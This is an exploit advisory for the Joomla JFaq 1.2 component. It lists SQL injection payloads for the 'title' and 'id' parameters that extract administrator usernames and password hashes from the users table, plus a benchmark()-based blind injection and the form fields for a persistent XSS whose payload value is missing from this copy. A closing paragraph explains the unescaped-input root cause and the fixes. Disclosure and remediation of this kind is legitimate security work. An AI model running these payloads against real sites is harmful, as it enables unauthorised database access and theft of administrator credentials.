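# Exploit Title: Joomla Component JFaq 1.2 Multiple Vulnerabilities
# Date: 11 May 2010
# Author: jdc
# Version: 1.2
# Tested on: PHP5, MySQL5

"title" input SQL injection
---------------------------
title', (select concat(username,char(32),password) from #__users where gid=25 limit 1), 1, 1, 1, 1, 1) -- '

id SQL injection
----------------
requires: magic quotes OFF, Joomla debug mode OFF

?option=com_jfaq
&task=detail
&id=-1' union select concat(username,char(32),password),2,3,4,5,6,7,8,9 from jos_users where gid=25 -- '

id Blind SQL injection
----------------------
requires: magic quotes OFF

?option=com_jfaq
&task=categ
&id=-1' union select benchmark(1000000,md5(5)) -- '

Persistent XSS
--------------
requires: a method to manually POST to form

postdata:
option=com_jfaq
task=add2
visitor_name=foo
categ=1
titlu=bar
question=

[The value of the question parameter is not present in this copy of the advisory; the text ends at "question=".]

Root cause and remediation: all three SQL injections depend on request values ("title", "id") reaching the query without escaping. The "magic quotes OFF" precondition on the two id cases shows the component relies on PHP's magic quotes rather than its own input handling. The component-side fix is to cast id to an integer and to escape or bind string inputs before they are placed in a query. The persistent XSS additionally needs the stored form fields to be output-encoded when they are displayed. The blind variant produces no visible output and is observable only as a response delay caused by benchmark().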